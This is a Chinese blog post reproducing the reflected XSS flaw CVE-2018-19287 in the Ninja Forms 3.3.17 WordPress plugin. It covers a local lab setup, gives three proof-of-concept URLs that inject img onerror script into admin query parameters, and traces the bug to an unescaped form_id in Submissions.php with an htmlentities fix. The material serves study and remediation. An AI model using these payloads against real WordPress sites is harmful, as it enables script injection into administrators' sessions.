Ninja Forms 3.3.17存在XSS漏洞(CVE-2018-19287)

最新推荐文章于 2023-10-31 17:13:05 发布
最新推荐文章于 2023-10-31 17:13:05 发布
阅读量1.3k 收藏
点赞数
文章标签: Ninja Forms 3.3.17存在XSS漏洞(CVE-2018-
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39627497/article/details/84847870
版权

进行了web攻击及防御的技术总结,内容不是很全,还会进行细节补充。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Ninja Forms 3.3.17存在XSS漏洞(CVE-2018-19287)

1.环境:
Win10
phpstudy2016
火狐浏览器
wordpress
Ninja Forms 3.3.17

2.复现
搭建PHPstudy+WordPress
下载并解压WordPress,修改配置文件wp-config.php:
在这里插入图片描述

打开phpmyadmin,新建wp数据库并设置:
在这里插入图片描述

进入http://localhost:8080/wordpress/
会看到wordpress的安装界面,输入相关信息完成安装。
在这里插入图片描述
在这里插入图片描述
进入搭建的网站
在这里插入图片描述

下载Ninja Forms 3.3.17
复制压缩包内的ninja forms目录到wordpress程序的安装目录下的/wp-content/pluginsss目录下
在这里插入图片描述

登录后台开启插件
在这里插入图片描述

POC1: http://localhost:8080/wordpress/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date&end_date="><img+src=mtk+οnerrοr=alert(/POC1/);//&filter_action=Filter&paged=1&action2=-1
在这里插入图片描述

POC2:
http://localhost:8080/wordpress/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src=mtk+οnerrοr=alert(/POC2/);//&end_date&filter_action=Filter&paged=1&action2=-1
在这里插入图片描述
由于
POC3:
http://localhost:8080/wordpress/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1">&nf_form_filter&paged=1
在这里插入图片描述

3.漏洞分析:
查阅相关资料后得知,POC3成功的原因:
Submissions.php文件存在
$form_id = ‘&form_id=’ . $_GET[ ‘form_id’ ] . ‘&nf_form_filter&paged=1’;
form_id并没有被过滤导致XSS的存在

利用htmlentities()等函数转义html实体
KaTeX parse error: Expected 'EOF', got '&' at position 12: form_id = '&̲form_id=' . htm…_GET[ ‘form_id’ ]) . ‘&nf_form_filter&paged=1’;
修改后,POC3就无法成功了

长哇儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
php获取form传递的变量,PHP-将变量传递给Ninja Form字段
weixin_32236671的博客
03-22 177
目的以下函数应使用变量在我的表单上预填充隐藏字段(hidden_​​email …).怀疑但是,在加载页面时已经声明了我需要传递给该字段的变量“ $cust_email”.现在,它包含一个电子邮件地址.当前结果问题是,当下面的代码运行时,该变量似乎已经为空.什么都没有传递到表单的字段.function create_page() {$cust_email = $json->emailAddr...
Apache Sling App CMS <1.1.4 存在反射型XSS漏洞CVE-2022-46769)
murphysec的博客
01-11 481
1.1.4 之前版本的 Apache Sling 中的 cms.js#confirmMessage 方法未对用户可控的 `title` 和 `message` 参数进行过滤,攻击者可将精心构造的 js 代码注入到 startcontent.jsp 页面的 `recentContent` 参数中,当用户访问该页面时远程执行恶意 javascript 代码。该漏洞存在 POC。
一个persistent XSS漏洞CVE-2021-40509
feekee的自留研习地
11-20 2753
前面说到有个xss漏洞没有申请成cve,那是因为个人没有把漏洞全部共享出来。 后来又在JFORUM2的类似的地方发现了一个存储型XSSCVE-2021-40509。
GitLab 存储型XSS漏洞CVE-2023-0050)
murphysec的博客
03-09 705
GitLab 是由GitLab公司开发的、基于Git的集成软件开发平台。kroki是一款集成在GitLab的基于文本的图表描述自动转为图片的开源工具,在GitLab 13.7引入。 由于Kroki中lib/banzai/filter/kroki_filter.rb对接收的image_src过滤不严,具有AsciiDoc、Markdown、reStructuredText 或 Textile 文档编辑权限的攻击者可通过恶意构造的Kroki图,当用户访问的页面对Kroki图渲染时,即可触发恶意代码,进行执行任
Ninja-Gradle-Plugin:忍者Gradle插件
07-06
忍者的 Gradle Superdev 插件。 contextPath = Jetty 上下文路径。 端口 = 码头端口。 scanDirs = 要观看的目录。 watchResources = 如果资源中的文件发生变化,则重新启动。 hotswapEnabled = true 如果需要热...
ninja-forms.3.0.34.1_ninja_WordPress_
10-03
标题中的“ninja-forms.3.0.34.1_ninja_WordPress_”表明这是Ninja Forms的3.0.34.1版本,专门针对WordPress平台优化。描述中提到的“Ninja forms 3.0.4 for WordPress”可能是指该版本稍有不同,但核心功能相同,都...
ninja-1.8.2.tar.gz
06-09
Ninja-1.8.2:高效构建工具的深度解析》 在IT行业中,构建工具扮演着至关重要的角色,它们使得开发者能够自动化地编译、测试和打包软件项目。Ninja,作为一款轻量级且高效的构建系统,因其快速的构建速度而备受...
obs-ninja-trampoline:忍者蹦床
04-27
转到 (或您自己的托管OBS.Ninja Trampoline的网站),然后使用表格即可。 表单字段是: 房间ID :这是房间标识符,与OBS.Ninja的room参数相对应。 它必须是全球唯一的。 房间密码:这是房间密码,与OBS.Ninja的...
ninja-forms-datepicker-localize:在Ninja Forms中设置jQuery UI Datepicker的默认值
05-02
这个场景下,我们关注的是“ninja-forms-datepicker-localize”,它涉及到如何在Ninja Forms中设置jQuery UI Datepicker的默认配置,以便更好地适应不同地域的用户需求。 Ninja Forms是一款强大的WordPress表单构建...
jquery xss验证代码
08-13
jquery xss验证代码,以txt打开,修改http://xxx/jquery.js,保存后加载有问题的jquery,可以出现弹窗
极难利用的XSSCVE-2023-22462)
weixin_45960266的博客
03-02 634
本身XSS的利用成本就很高,选哟用户交互才可以实现,再加上React的呈现周期,就更难利用了。
vulhub学习文档-Drupal XSS漏洞
ploto_cs的博客
09-11 1062
Drupal XSS漏洞 一.漏洞介绍 (一)编号 CVE-2019-6341 (二)概述 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。 (三)影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 (四)漏洞要求 <= Durpal 8.6.6 服务端开启评论配图或者攻击者拥有author以上权限的账号 被
CVE-2023-29489 cPanel XSS漏洞分析研究
蚁景网安学院
05-04 1562
前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。一、漏洞原理漏洞简述cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail ...
【JQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023)漏洞复现】
最新发布
一纸荒芜的博客
10-31 1万+
jquery-xss漏洞复现
jQuery最新xss漏洞浅析、复现、修复
热门推荐
qq_29365787的博客
06-08 1万+
jQuery最新xss漏洞浅析、复现、修复 1、xss漏洞的形成和危害 形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是 应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。 在以下情况下会发生跨站点脚本编制 (XSS) 脆弱性: [1] 不可信数据进入 Web 应用程序,通常来自 Web 请求。 [2] Web 应用程序动态生成了包含此不可信数据的 Web 页面。 [3] 页面生成期间,应用程序不会禁止数据包含可由 Web 浏览器执
CVE-2017-12794 存储型xss漏洞
m0_63034363的博客
07-09 1039
CVE-2017-12794 存储型xss漏洞 主要是因为数据库报错将恶意代码爆出造成xss弹框
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)
qq_51577576的博客
02-21 1495
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。Drupal在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞
一个CVE申请的web xss漏洞
feekee的自留研习地
01-07 1308
因为没有共享出来,导致没有申请CVE
Command [ ninja , -v ] returned non-zero exit status 1.
07-28
tar -xf ninja-v1.10.2.tar.gz ``` 进入解压后的目录: ``` cd ninja-1.10.2 ``` 2. 接下来,你需要进行配置和编译。运行以下命令: ``` ./configure.py --bootstrap ``` 3. 完成配置和编译后,你需要将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值